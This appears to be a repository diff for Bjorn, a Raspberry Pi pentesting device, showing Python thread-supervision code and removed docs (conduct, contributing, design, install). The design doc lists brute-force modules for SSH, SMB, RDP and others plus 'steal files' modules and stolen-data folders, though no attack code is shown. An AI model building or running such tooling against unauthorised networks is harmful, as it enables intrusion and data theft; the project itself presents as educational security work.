self.shared_data.manual_mode = True
else:
logger.info("Orchestrator thread is not running.")
self.shared_data.queue_event.set() # Wake up thread
thread.join(timeout=10.0)
if thread.is_alive():
logger.warning_throttled(
"Orchestrator thread did not stop gracefully",
key="orch_stop_not_graceful",
interval_s=20,
)
return
def is_wifi_connected(self):
"""Checks for Wi-Fi connectivity using the nmcli command."""
result = subprocess.Popen(['nmcli', '-t', '-f', 'active', 'dev', 'wifi'], stdout=subprocess.PIPE, text=True).communicate()[0]
self.wifi_connected = 'yes' in result
return self.wifi_connected
self.orchestrator_thread = None
self.orchestrator = None
self.shared_data.bjorn_orch_status = "IDLE"
self.shared_data.bjorn_status_text2 = ""
def is_network_connected(self):
"""Checks for network connectivity with throttling and low-CPU checks."""
now = time.time()
# Throttling: Do not scan more than once every 10 seconds
if now - self._last_net_check < 10:
return self.network_connected
self._last_net_check = now
def interface_has_ip(interface_name):
try:
# OPTIMIZATION: Check /sys/class/net first to avoid spawning subprocess if interface doesn't exist
if not os.path.exists(f"/sys/class/net/{interface_name}"):
return False
# Check for IP address
result = subprocess.run(
["ip", "-4", "addr", "show", interface_name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True,
timeout=2,
)
if result.returncode != 0:
return False
return "inet " in result.stdout
except Exception:
return False
eth_connected = interface_has_ip("eth0")
wifi_connected = interface_has_ip("wlan0")
self.network_connected = eth_connected or wifi_connected
if self.network_connected != self.previous_network_connected:
if self.network_connected:
logger.info(f"Network status changed: Connected (eth0={eth_connected}, wlan0={wifi_connected})")
else:
logger.warning("Network status changed: Connection lost")
self.previous_network_connected = self.network_connected
return self.network_connected
@staticmethod
def start_display():
"""Start the display thread"""
def start_display(old_display=None):
# Ensure the previous Display's controller is fully stopped to release frames
if old_display is not None:
try:
old_display.display_controller.stop(timeout=3.0)
except Exception:
pass
display = Display(shared_data)
display_thread = threading.Thread(target=display.run)
display_thread = threading.Thread(
target=display.run,
daemon=True,
name="DisplayMain",
)
display_thread.start()
return display_thread
return display_thread, display
def handle_exit(sig, frame, display_thread, bjorn_thread, web_thread):
"""Handles the termination of the main, display, and web threads."""
def _request_shutdown():
"""Signals all threads to stop."""
shared_data.should_exit = True
shared_data.orchestrator_should_exit = True # Ensure orchestrator stops
shared_data.display_should_exit = True # Ensure display stops
shared_data.webapp_should_exit = True # Ensure web server stops
handle_exit_display(sig, frame, display_thread)
if display_thread.is_alive():
display_thread.join()
if bjorn_thread.is_alive():
bjorn_thread.join()
if web_thread.is_alive():
web_thread.join()
logger.info("Main loop finished. Clean exit.")
sys.exit(0) # Used sys.exit(0) instead of exit(0)
shared_data.orchestrator_should_exit = True
shared_data.display_should_exit = True
shared_data.webapp_should_exit = True
shared_data.queue_event.set()
def handle_exit(
sig,
frame,
display_thread,
bjorn_thread,
web_thread_obj,
health_thread=None,
runtime_state_thread=None,
from_signal=False,
):
global _shutdown_started
with _shutdown_lock:
if _shutdown_started:
if from_signal:
logger.warning("Forcing exit (SIGINT/SIGTERM received twice)")
os._exit(130)
return
_shutdown_started = True
logger.info(f"Shutdown signal received: {sig}")
_request_shutdown()
# 1. Stop Display (handles EPD cleanup)
try:
handle_exit_display(sig, frame, display_thread)
except Exception:
pass
# 2. Stop Health Monitor
try:
if health_thread and hasattr(health_thread, "stop"):
health_thread.stop()
except Exception:
pass
# 2b. Stop Runtime State Updater
try:
if runtime_state_thread and hasattr(runtime_state_thread, "stop"):
runtime_state_thread.stop()
except Exception:
pass
# 3. Stop Web Server
try:
if web_thread_obj and hasattr(web_thread_obj, "shutdown"):
web_thread_obj.shutdown()
except Exception:
pass
# 4. Join all threads
for thread in (display_thread, bjorn_thread, web_thread_obj, health_thread, runtime_state_thread):
try:
if thread and thread.is_alive():
thread.join(timeout=5.0)
except Exception:
pass
# 5. Close Database (Prevent corruption)
try:
if hasattr(shared_data, "db") and hasattr(shared_data.db, "close"):
shared_data.db.close()
except Exception as exc:
logger.error(f"Database shutdown error: {exc}")
logger.info("Bjorn stopped. Clean exit.")
_release_instance_lock()
if from_signal:
sys.exit(0)
def _install_thread_excepthook():
def _hook(args):
logger.error(f"Unhandled thread exception: {args.thread.name} - {args.exc_type.__name__}: {args.exc_value}")
# We don't force shutdown here to avoid killing the app on minor thread glitches,
# unless it's critical. The Crash Shield will handle restarts.
threading.excepthook = _hook
if __name__ == "__main__":
logger.info("Starting threads")
if not _acquire_instance_lock():
sys.exit(1)
atexit.register(_release_instance_lock)
_install_thread_excepthook()
display_thread = None
display_instance = None
bjorn_thread = None
health_thread = None
runtime_state_thread = None
last_gc_time = time.time()
try:
logger.info("Loading shared data config...")
logger.info("Bjorn Startup: Loading config...")
shared_data.load_config()
logger.info("Starting display thread...")
shared_data.display_should_exit = False # Initialize display should_exit
display_thread = Bjorn.start_display()
logger.info("Starting Runtime State Updater...")
runtime_state_thread = RuntimeStateUpdater(shared_data)
runtime_state_thread.start()
logger.info("Starting Bjorn thread...")
logger.info("Starting Display...")
shared_data.display_should_exit = False
display_thread, display_instance = Bjorn.start_display()
logger.info("Starting Bjorn Core...")
bjorn = Bjorn(shared_data)
shared_data.bjorn_instance = bjorn # Assigner l'instance de Bjorn à shared_data
bjorn_thread = threading.Thread(target=bjorn.run)
shared_data.bjorn_instance = bjorn
bjorn_thread = threading.Thread(target=bjorn.run, daemon=True, name="BjornMain")
bjorn_thread.start()
if shared_data.config["websrv"]:
logger.info("Starting the web server...")
web_thread.start()
if shared_data.config.get("websrv", False):
logger.info("Starting Web Server...")
if not web_thread.is_alive():
web_thread.start()
signal.signal(signal.SIGINT, lambda sig, frame: handle_exit(sig, frame, display_thread, bjorn_thread, web_thread))
signal.signal(signal.SIGTERM, lambda sig, frame: handle_exit(sig, frame, display_thread, bjorn_thread, web_thread))
health_interval = int(shared_data.config.get("health_log_interval", 60))
health_thread = HealthMonitor(shared_data, interval_s=health_interval)
health_thread.start()
except Exception as e:
logger.error(f"An exception occurred during thread start: {e}")
handle_exit_display(signal.SIGINT, None)
exit(1)
# Signal Handlers
exit_handler = lambda s, f: handle_exit(
s,
f,
display_thread,
bjorn_thread,
web_thread,
health_thread,
runtime_state_thread,
True,
)
signal.signal(signal.SIGINT, exit_handler)
signal.signal(signal.SIGTERM, exit_handler)
# --- SUPERVISOR LOOP (Crash Shield) ---
restart_times = []
max_restarts = 5
restart_window_s = 300
logger.info("Bjorn Supervisor running.")
while not shared_data.should_exit:
time.sleep(2) # CPU Friendly polling
now = time.time()
# --- OPTIMIZATION: Periodic Garbage Collection ---
# Forces cleanup of circular references and free RAM every 2 mins
if now - last_gc_time > 120:
gc.collect()
last_gc_time = now
logger.debug("System: Forced Garbage Collection executed.")
# --- CRASH SHIELD: Bjorn Thread ---
if bjorn_thread and not bjorn_thread.is_alive() and not shared_data.should_exit:
restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
restart_times.append(now)
if len(restart_times) <= max_restarts:
logger.warning("Crash Shield: Restarting Bjorn Main Thread")
bjorn_thread = threading.Thread(target=bjorn.run, daemon=True, name="BjornMain")
bjorn_thread.start()
else:
logger.critical("Crash Shield: Bjorn exceeded restart budget. Shutting down.")
_request_shutdown()
break
# --- CRASH SHIELD: Display Thread ---
if display_thread and not display_thread.is_alive() and not shared_data.should_exit:
restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
restart_times.append(now)
if len(restart_times) <= max_restarts:
logger.warning("Crash Shield: Restarting Display Thread")
display_thread, display_instance = Bjorn.start_display(old_display=display_instance)
else:
logger.critical("Crash Shield: Display exceeded restart budget. Shutting down.")
_request_shutdown()
break
# --- CRASH SHIELD: Runtime State Updater ---
if runtime_state_thread and not runtime_state_thread.is_alive() and not shared_data.should_exit:
restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
restart_times.append(now)
if len(restart_times) <= max_restarts:
logger.warning("Crash Shield: Restarting Runtime State Updater")
runtime_state_thread = RuntimeStateUpdater(shared_data)
runtime_state_thread.start()
else:
logger.critical("Crash Shield: Runtime State Updater exceeded restart budget. Shutting down.")
_request_shutdown()
break
# Exit cleanup
if health_thread:
health_thread.stop()
if runtime_state_thread:
runtime_state_thread.stop()
handle_exit(
signal.SIGTERM,
None,
display_thread,
bjorn_thread,
web_thread,
health_thread,
runtime_state_thread,
False,
)
except Exception as exc:
logger.critical(f"Critical bootstrap failure: {exc}")
_request_shutdown()
# Try to clean up anyway
try:
handle_exit(
signal.SIGTERM,
None,
display_thread,
bjorn_thread,
web_thread,
health_thread,
runtime_state_thread,
False,
)
except:
pass
sys.exit(1)

View File

@@ -1,40 +0,0 @@
# 📝 Code of Conduct
Take Note About This... **Take Note...**
## 🤝 Our Commitment
We are committed to fostering an open and welcoming environment for all contributors. As such, everyone who participates in **Bjorn** is expected to adhere to the following code of conduct.
## 🌟 Expected Behavior
- **Respect:** Be respectful of differing viewpoints and experiences.
- **Constructive Feedback:** Provide constructive feedback and be open to receiving it.
- **Empathy and Kindness:** Show empathy and kindness towards other contributors.
- **Respect for Maintainers:** Respect the decisions of the maintainers.
- **Positive Intent:** Assume positive intent in interactions with others.
## 🚫 Unacceptable Behavior
- **Harassment or Discrimination:** Harassment or discrimination in any form.
- **Inappropriate Language or Imagery:** Use of inappropriate language or imagery.
- **Personal Attacks:** Personal attacks or insults.
- **Public or Private Harassment:** Public or private harassment.
## 📢 Reporting Misconduct
If you encounter any behavior that violates this code of conduct, please report it by contacting [bjorn-cyberviking@outlook.com](mailto:bjorn-cyberviking@outlook.com). All complaints will be reviewed and handled appropriately.
## ⚖️ Enforcement
Instances of unacceptable behavior may be addressed by the project maintainers, who are responsible for clarifying and enforcing this code of conduct. Violations may result in temporary or permanent bans from the project and related spaces.
## 🙏 Acknowledgments
This code of conduct is adapted from the [Contributor Covenant, version 2.0](https://www.contributor-covenant.org/version/2/0/code_of_conduct.html).
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

View File

@@ -1,51 +0,0 @@
# 🤝 Contributing to Bjorn
We welcome contributions to Bjorn! To make sure the process goes smoothly, please follow these guidelines:
## 📋 Code of Conduct
Please note that all participants in our project are expected to follow our [Code of Conduct](#-code-of-conduct). Make sure to review it before contributing.
## 🛠 How to Contribute
1. **Fork the repository**:
Fork the project to your GitHub account using the GitHub interface.
2. **Create a new branch**:
Use a descriptive branch name for your feature or bugfix:
git checkout -b feature/your-feature-name
3. **Make your changes**:
Implement your feature or fix the bug in your branch. Make sure to include tests where applicable and follow coding standards.
4. **Test your changes**:
Run the test suite to ensure your changes dont break any functionality:
- ...
5. **Commit your changes**:
Use meaningful commit messages that explain what you have done:
git commit -m "Add feature/fix: Description of changes"
6. **Push your changes**:
Push your changes to your fork:
git push origin feature/your-feature-name
7. **Submit a Pull Request**:
Create a pull request on the main repository, detailing the changes youve made. Link any issues your changes resolve and provide context.
## 📑 Guidelines for Contributions
- **Lint your code** before submitting a pull request. We use [ESLint](https://eslint.org/) for frontend and [pylint](https://www.pylint.org/) for backend linting.
- Ensure **test coverage** for your code. Uncovered code may delay the approval process.
- Write clear, concise **commit messages**.
Thank you for helping improve!
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

View File

@@ -1,373 +0,0 @@
# 🖲️ Bjorn Development
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Design](#-design)
- [Educational Aspects](#-educational-aspects)
- [Disclaimer](#-disclaimer)
- [Extensibility](#-extensibility)
- [Development Status](#-development-status)
- [Project Structure](#-project-structure)
- [Core Files](#-core-files)
- [Actions](#-actions)
- [Data Structure](#-data-structure)
- [Detailed Project Description](#-detailed-project-description)
- [Behaviour of Bjorn](#-behavior-of-bjorn)
- [Running Bjorn](#-running-bjorn)
- [Manual Start](#-manual-start)
- [Service Control](#-service-control)
- [Fresh Start](#-fresh-start)
- [Important Configuration Files](#-important-configuration-files)
- [Shared Configuration](#-shared-configuration-shared_configjson)
- [Actions Configuration](#-actions-configuration-actionsjson)
- [E-Paper Display Support](#-e-paper-display-support)
- [Ghosting Removed](#-ghosting-removed)
- [Development Guidelines](#-development-guidelines)
- [Adding New Actions](#-adding-new-actions)
- [Testing](#-testing)
- [Web Interface](#-web-interface)
- [Project Roadmap](#-project-roadmap)
- [Current Focus](#-future-plans)
- [Future Plans](#-future-plans)
- [License](#-license)
## 🎨 Design
- **Portability**: Self-contained and portable device, ideal for penetration testing.
- **Modularity**: Extensible architecture allowing addition of new actions.
- **Visual Interface**: The e-Paper HAT provides a visual interface for monitoring the ongoing actions, displaying results or stats, and interacting with Bjorn .
## 📔 Educational Aspects
- **Learning Tool**: Designed as an educational tool to understand cybersecurity concepts and penetration testing techniques.
- **Practical Experience**: Provides a practical means for students and professionals to familiarize themselves with network security practices and vulnerability assessment tools.
## ✒️ Disclaimer
- **Ethical Use**: This project is strictly for educational purposes.
- **Responsibility**: The author and contributors disclaim any responsibility for misuse of Bjorn.
- **Legal Compliance**: Unauthorized use of this tool for malicious activities is prohibited and may be prosecuted by law.
## 🧩 Extensibility
- **Evolution**: The main purpose of Bjorn is to gain new actions and extend his arsenal over time.
- **Modularity**: Actions are designed to be modular and can be easily extended or modified to add new functionality.
- **Possibilities**: From capturing pcap files to cracking hashes, man-in-the-middle attacks, and more—the possibilities are endless.
- **Contribution**: It's up to the user to develop new actions and add them to the project.
## 🔦 Development Status
- **Project Status**: Ongoing development.
- **Current Version**: Scripted auto-installer, or manual installation. Not yet packaged with Raspberry Pi OS.
- **Reason**: The project is still in an early stage, requiring further development and debugging.
### 🗂️ Project Structure
```
Bjorn/
├── Bjorn.py
├── comment.py
├── display.py
├── epd_helper.py
├── init_shared.py
├── kill_port_8000.sh
├── logger.py
├── orchestrator.py
├── requirements.txt
├── shared.py
├── utils.py
├── webapp.py
├── __init__.py
├── actions/
│ ├── ftp_connector.py
│ ├── ssh_connector.py
│ ├── smb_connector.py
│ ├── rdp_connector.py
│ ├── telnet_connector.py
│ ├── sql_connector.py
│ ├── steal_files_ftp.py
│ ├── steal_files_ssh.py
│ ├── steal_files_smb.py
│ ├── steal_files_rdp.py
│ ├── steal_files_telnet.py
│ ├── steal_data_sql.py
│ ├── nmap_vuln_scanner.py
│ ├── scanning.py
│ └── __init__.py
├── backup/
│ ├── backups/
│ └── uploads/
├── config/
├── data/
│ ├── input/
│ │ └── dictionary/
│ ├── logs/
│ └── output/
│ ├── crackedpwd/
│ ├── data_stolen/
│ ├── scan_results/
│ ├── vulnerabilities/
│ └── zombies/
└── resources/
└── waveshare_epd/
```
### ⚓ Core Files
#### Bjorn.py
The main entry point for the application. It initializes and runs the main components, including the network scanner, orchestrator, display, and web server.
#### comment.py
Handles generating all the Bjorn comments displayed on the e-Paper HAT based on different themes/actions and statuses.
#### display.py
Manages the e-Paper HAT display, updating the screen with Bjorn character, the dialog/comments, and the current information such as network status, vulnerabilities, and various statistics.
#### epd_helper.py
Handles the low-level interactions with the e-Paper display hardware.
#### logger.py
Defines a custom logger with specific formatting and handlers for console and file logging. It also includes a custom log level for success messages.
#### orchestrator.py
Bjorns AI, a heuristic engine that orchestrates the different actions such as network scanning, vulnerability scanning, attacks, and file stealing. It loads and executes actions based on the configuration and sets the status of the actions and Bjorn.
#### shared.py
Defines the `SharedData` class that holds configuration settings, paths, and methods for updating and managing shared data across different modules.
#### init_shared.py
Initializes shared data that is used across different modules. It loads the configuration and sets up necessary paths and variables.
#### utils.py
Contains utility functions used throughout the project.
#### webapp.py
Sets up and runs a web server to provide a web interface for changing settings, monitoring and interacting with Bjorn.
### ▶️ Actions
#### actions/scanning.py
Conducts network scanning to identify live hosts and open ports. It updates the network knowledge base (`netkb`) and generates scan results.
#### actions/nmap_vuln_scanner.py
Performs vulnerability scanning using Nmap. It parses the results and updates the vulnerability summary for each host.
#### Protocol Connectors
- **ftp_connector.py**: Brute-force attacks on FTP services.
- **ssh_connector.py**: Brute-force attacks on SSH services.
- **smb_connector.py**: Brute-force attacks on SMB services.
- **rdp_connector.py**: Brute-force attacks on RDP services.
- **telnet_connector.py**: Brute-force attacks on Telnet services.
- **sql_connector.py**: Brute-force attacks on SQL services.
#### File Stealing Modules
- **steal_files_ftp.py**: Steals files from FTP servers.
- **steal_files_smb.py**: Steals files from SMB shares.
- **steal_files_ssh.py**: Steals files from SSH servers.
- **steal_files_telnet.py**: Steals files from Telnet servers.
- **steal_data_sql.py**: Extracts data from SQL databases.
### 📇 Data Structure
#### Network Knowledge Base (netkb.csv)
Located at `data/netkb.csv`. Stores information about:
- Known hosts and their status. (Alive or offline)
- Open ports and vulnerabilities.
- Action execution history. (Success or failed)
**Preview Example:**
![netkb1](https://github.com/infinition/Bjorn/assets/37984399/f641a565-2765-4280-a7d7-5b25c30dcea5)
![netkb2](https://github.com/infinition/Bjorn/assets/37984399/f08114a2-d7d1-4f50-b1c4-a9939ba66056)
#### Scan Results
Located in `data/output/scan_results/`.
This file is generated everytime the network is scanned. It is used to consolidate the data and update netkb.
**Example:**
![Scan result](https://github.com/infinition/Bjorn/assets/37984399/eb4a313a-f90c-4c43-b699-3678271886dc)
#### Live Status (livestatus.csv)
Contains real-time information displayed on the e-Paper HAT:
- Total number of known hosts.
- Currently alive hosts.
- Open ports count.
- Other runtime statistics.
## 📖 Detailed Project Description
### 👀 Behavior of Bjorn
Once launched, Bjorn performs the following steps:
1. **Initialization**: Loads configuration, initializes shared data, and sets up necessary components such as the e-Paper HAT display.
2. **Network Scanning**: Scans the network to identify live hosts and open ports. Updates the network knowledge base (`netkb`) with the results.
3. **Orchestration**: Orchestrates different actions based on the configuration and network knowledge base. This includes performing vulnerability scanning, attacks, and file stealing.
4. **Vulnerability Scanning**: Performs vulnerability scans on identified hosts and updates the vulnerability summary.
5. **Brute-Force Attacks and File Stealing**: Starts brute-force attacks and steals files based on the configuration criteria.
6. **Display Updates**: Continuously updates the e-Paper HAT display with current information such as network status, vulnerabilities, and various statistics. Bjorn also displays random comments based on different themes and statuses.
7. **Web Server**: Provides a web interface for monitoring and interacting with Bjorn.
## ▶️ Running Bjorn
### 📗 Manual Start
To manually start Bjorn (without the service, ensure the service is stopped « sudo systemctl stop bjorn.service »):
```bash
cd /home/bjorn/Bjorn
# Run Bjorn
sudo python Bjorn.py
```
### 🕹️ Service Control
Control the Bjorn service:
```bash
# Start Bjorn
sudo systemctl start bjorn.service
# Stop Bjorn
sudo systemctl stop bjorn.service
# Check status
sudo systemctl status bjorn.service
# View logs
sudo journalctl -u bjorn.service
```
### 🪄 Fresh Start
To reset Bjorn to a clean state:
```bash
sudo rm -rf /home/bjorn/Bjorn/config/*.json \
/home/bjorn/Bjorn/data/*.csv \
/home/bjorn/Bjorn/data/*.log \
/home/bjorn/Bjorn/data/output/data_stolen/* \
/home/bjorn/Bjorn/data/output/crackedpwd/* \
/home/bjorn/Bjorn/config/* \
/home/bjorn/Bjorn/data/output/scan_results/* \
/home/bjorn/Bjorn/__pycache__ \
/home/bjorn/Bjorn/config/__pycache__ \
/home/bjorn/Bjorn/data/__pycache__ \
/home/bjorn/Bjorn/actions/__pycache__ \
/home/bjorn/Bjorn/resources/__pycache__ \
/home/bjorn/Bjorn/web/__pycache__ \
/home/bjorn/Bjorn/*.log \
/home/bjorn/Bjorn/resources/waveshare_epd/__pycache__ \
/home/bjorn/Bjorn/data/logs/* \
/home/bjorn/Bjorn/data/output/vulnerabilities/* \
/home/bjorn/Bjorn/data/logs/*
```
Everything will be recreated automatically at the next launch of Bjorn.
## ❇️ Important Configuration Files
### 🔗 Shared Configuration (`shared_config.json`)
Defines various settings for Bjorn, including:
- Boolean settings (`manual_mode`, `websrv`, `debug_mode`, etc.).
- Time intervals and delays.
- Network settings.
- Port lists and blacklists.
These settings are accessible on the webpage.
### 🛠️ Actions Configuration (`actions.json`)
Lists the actions to be performed by Bjorn, including (dynamically generated with the content of the folder):
- Module and class definitions.
- Port assignments.
- Parent-child relationships.
- Action status definitions.
## 📟 E-Paper Display Support
Currently, hardcoded for the 2.13-inch V2 & V4 e-Paper HAT.
My program automatically detect the screen model and adapt the python expressions into my code.
For other versions:
- As I don't have the v1 and v3 to validate my algorithm, I just hope it will work properly.
### 🍾 Ghosting Removed!
In my journey to make Bjorn work with the different screen versions, I struggled, hacking several parameters and found out that it was possible to remove the ghosting of screens! I let you see this, I think this method will be very useful for all other projects with the e-paper screen!
## ✍️ Development Guidelines
### Adding New Actions
1. Create a new action file in `actions/`.
2. Implement required methods:
- `__init__(self, shared_data)`
- `execute(self, ip, port, row, status_key)`
3. Add the action to `actions.json`.
4. Follow existing action patterns.
### 🧪 Testing
1. Create a test environment.
2. Use an isolated network.
3. Follow ethical guidelines.
4. Document test cases.
## 💻 Web Interface
- **Access**: `http://[device-ip]:8000`
- **Features**:
- Real-time monitoring with a console.
- Configuration management.
- Viewing results. (Credentials and files)
- System control.
## 🧭 Project Roadmap
### 🪛 Current Focus
- Stability improvements.
- Bug fixes.
- Service reliability.
- Documentation updates.
### 🧷 Future Plans
- Additional attack modules.
- Enhanced reporting.
- Improved user interface.
- Extended protocol support.
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

View File

@@ -1,468 +0,0 @@
## 🔧 Installation and Configuration
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Prerequisites](#-prerequisites)
- [Quick Install](#-quick-install)
- [Manual Install](#-manual-install)
- [License](#-license)
Use Raspberry Pi Imager to install your OS
https://www.raspberrypi.com/software/
### 📌 Prerequisites for RPI zero W (32bits)
![image](https://github.com/user-attachments/assets/3980ec5f-a8fc-4848-ab25-4356e0529639)
- Raspberry Pi OS installed.
- Stable:
- System: 32-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-armhf-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
### 📌 Prerequisites for RPI zero W2 (64bits)
![image](https://github.com/user-attachments/assets/e8d276be-4cb2-474d-a74d-b5b6704d22f5)
I did not develop Bjorn for the raspberry pi zero w2 64bits, but several feedbacks have attested that the installation worked perfectly.
- Raspberry Pi OS installed.
- Stable:
- System: 64-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-arm64-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
At the moment the paper screen v2 v4 have been tested and implemented.
I juste hope the V1 & V3 will work the same.
### ⚡ Quick Install
The fastest way to install Bjorn is using the automatic installation script :
```bash
# Download and run the installer
wget https://raw.githubusercontent.com/infinition/Bjorn/refs/heads/main/install_bjorn.sh
sudo chmod +x install_bjorn.sh
sudo ./install_bjorn.sh
# Choose the choice 1 for automatic installation. It may take a while as a lot of packages and modules will be installed. You must reboot at the end.
```
### 🧰 Manual Install
#### Step 1: Activate SPI & I2C
```bash
sudo raspi-config
```
- Navigate to **"Interface Options"**.
- Enable **SPI**.
- Enable **I2C**.
#### Step 2: System Dependencies
```bash
# Update system
sudo apt-get update && sudo apt-get upgrade -y
# Install required packages
sudo apt install -y \
libjpeg-dev \
zlib1g-dev \
libpng-dev \
python3-dev \
libffi-dev \
libssl-dev \
libgpiod-dev \
libi2c-dev \
libatlas-base-dev \
build-essential \
python3-pip \
wget \
lsof \
git \
libopenjp2-7 \
nmap \
libopenblas-dev \
bluez-tools \
bluez \
dhcpcd5 \
bridge-utils \
python3-pil
# Update Nmap scripts database
sudo nmap --script-updatedb
```
#### Step 3: Bjorn Installation
```bash
# Clone the Bjorn repository
cd /home/bjorn
git clone https://github.com/infinition/Bjorn.git
cd Bjorn
# Install Python dependencies within the virtual environment
sudo pip install -r requirements.txt --break-system-packages
# As i did not succeed "for now" to get a stable installation with a virtual environment, i installed the dependencies system wide (with --break-system-packages), it did not cause any issue so far. You can try to install them in a virtual environment if you want.
```
##### 3.1: Configure E-Paper Display Type
Choose your e-Paper HAT version by modifying the configuration file:
1. Open the configuration file:
```bash
sudo vi /home/bjorn/Bjorn/config/shared_config.json
```
Press i to enter insert mode
Locate the line containing "epd_type":
Change the value according to your screen model:
- For 2.13 V1: "epd_type": "epd2in13",
- For 2.13 V2: "epd_type": "epd2in13_V2",
- For 2.13 V3: "epd_type": "epd2in13_V3",
- For 2.13 V4: "epd_type": "epd2in13_V4",
Press Esc to exit insert mode
Type :wq and press Enter to save and quit
#### Step 4: Configure File Descriptor Limits
To prevent `OSError: [Errno 24] Too many open files`, it's essential to increase the file descriptor limits.
##### 4.1: Modify File Descriptor Limits for All Users
Edit `/etc/security/limits.conf`:
```bash
sudo vi /etc/security/limits.conf
```
Add the following lines:
```
* soft nofile 65535
* hard nofile 65535
root soft nofile 65535
root hard nofile 65535
```
##### 4.2: Configure Systemd Limits
Edit `/etc/systemd/system.conf`:
```bash
sudo vi /etc/systemd/system.conf
```
Uncomment and modify:
```
DefaultLimitNOFILE=65535
```
Edit `/etc/systemd/user.conf`:
```bash
sudo vi /etc/systemd/user.conf
```
Uncomment and modify:
```
DefaultLimitNOFILE=65535
```
##### 4.3: Create or Modify `/etc/security/limits.d/90-nofile.conf`
```bash
sudo vi /etc/security/limits.d/90-nofile.conf
```
Add:
```
root soft nofile 65535
root hard nofile 65535
```
##### 4.4: Adjust the System-wide File Descriptor Limit
Edit `/etc/sysctl.conf`:
```bash
sudo vi /etc/sysctl.conf
```
Add:
```
fs.file-max = 2097152
```
Apply the changes:
```bash
sudo sysctl -p
```
#### Step 5: Reload Systemd and Apply Changes
Reload systemd to apply the new file descriptor limits:
```bash
sudo systemctl daemon-reload
```
#### Step 6: Modify PAM Configuration Files
PAM (Pluggable Authentication Modules) manages how limits are enforced for user sessions. To ensure that the new file descriptor limits are respected, update the following configuration files.
##### Step 6.1: Edit `/etc/pam.d/common-session` and `/etc/pam.d/common-session-noninteractive`
```bash
sudo vi /etc/pam.d/common-session
sudo vi /etc/pam.d/common-session-noninteractive
```
Add this line at the end of both files:
```
session required pam_limits.so
```
This ensures that the limits set in `/etc/security/limits.conf` are enforced for all user sessions.
#### Step 7: Configure Services
##### 7.1: Bjorn Service
Create the service file:
```bash
sudo vi /etc/systemd/system/bjorn.service
```
Add the following content:
```ini
[Unit]
Description=Bjorn Service
DefaultDependencies=no
Before=basic.target
After=local-fs.target
[Service]
ExecStartPre=/home/bjorn/Bjorn/kill_port_8000.sh
ExecStart=/usr/bin/python3 /home/bjorn/Bjorn/Bjorn.py
WorkingDirectory=/home/bjorn/Bjorn
StandardOutput=inherit
StandardError=inherit
Restart=always
User=root
# Check open files and restart if it reached the limit (ulimit -n buffer of 1000)
ExecStartPost=/bin/bash -c 'FILE_LIMIT=$(ulimit -n); THRESHOLD=$(( FILE_LIMIT - 1000 )); while :; do TOTAL_OPEN_FILES=$(lsof | wc -l); if [ "$TOTAL_OPEN_FILES" -ge "$THRESHOLD" ]; then echo "File descriptor threshold reached: $TOTAL_OPEN_FILES (threshold: $THRESHOLD). Restarting service."; systemctl restart bjorn.service; exit 0; fi; sleep 10; done &'
[Install]
WantedBy=multi-user.target
```
##### 7.2: Port 8000 Killer Script
Create the script to free up port 8000:
```bash
vi /home/bjorn/Bjorn/kill_port_8000.sh
```
Add:
```bash
#!/bin/bash
PORT=8000
PIDS=$(lsof -t -i:$PORT)
if [ -n "$PIDS" ]; then
echo "Killing PIDs using port $PORT: $PIDS"
kill -9 $PIDS
fi
```
Make the script executable:
```bash
chmod +x /home/bjorn/Bjorn/kill_port_8000.sh
```
##### 7.3: USB Gadget Configuration
Modify `/boot/firmware/cmdline.txt`:
```bash
sudo vi /boot/firmware/cmdline.txt
```
Add the following right after `rootwait`:
```
modules-load=dwc2,g_ether
```
Modify `/boot/firmware/config.txt`:
```bash
sudo vi /boot/firmware/config.txt
```
Add at the end of the file:
```
dtoverlay=dwc2
```
Create the USB gadget script:
```bash
sudo vi /usr/local/bin/usb-gadget.sh
```
Add the following content:
```bash
#!/bin/bash
set -e
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir -p g1
cd g1
echo 0x1d6b > idVendor
echo 0x0104 > idProduct
echo 0x0100 > bcdDevice
echo 0x0200 > bcdUSB
mkdir -p strings/0x409
echo "fedcba9876543210" > strings/0x409/serialnumber
echo "Raspberry Pi" > strings/0x409/manufacturer
echo "Pi Zero USB" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "Config 1: ECM network" > configs/c.1/strings/0x409/configuration
echo 250 > configs/c.1/MaxPower
mkdir -p functions/ecm.usb0
# Check for existing symlink and remove if necessary
if [ -L configs/c.1/ecm.usb0 ]; then
rm configs/c.1/ecm.usb0
fi
ln -s functions/ecm.usb0 configs/c.1/
# Ensure the device is not busy before listing available USB device controllers
max_retries=10
retry_count=0
while ! ls /sys/class/udc > UDC 2>/dev/null; do
if [ $retry_count -ge $max_retries ]; then
echo "Error: Device or resource busy after $max_retries attempts."
exit 1
fi
retry_count=$((retry_count + 1))
sleep 1
done
# Check if the usb0 interface is already configured
if ! ip addr show usb0 | grep -q "172.20.2.1"; then
ifconfig usb0 172.20.2.1 netmask 255.255.255.0
else
echo "Interface usb0 already configured."
fi
```
Make the script executable:
```bash
sudo chmod +x /usr/local/bin/usb-gadget.sh
```
Create the systemd service:
```bash
sudo vi /etc/systemd/system/usb-gadget.service
```
Add:
```ini
[Unit]
Description=USB Gadget Service
After=network.target
[Service]
ExecStartPre=/sbin/modprobe libcomposite
ExecStart=/usr/local/bin/usb-gadget.sh
Type=simple
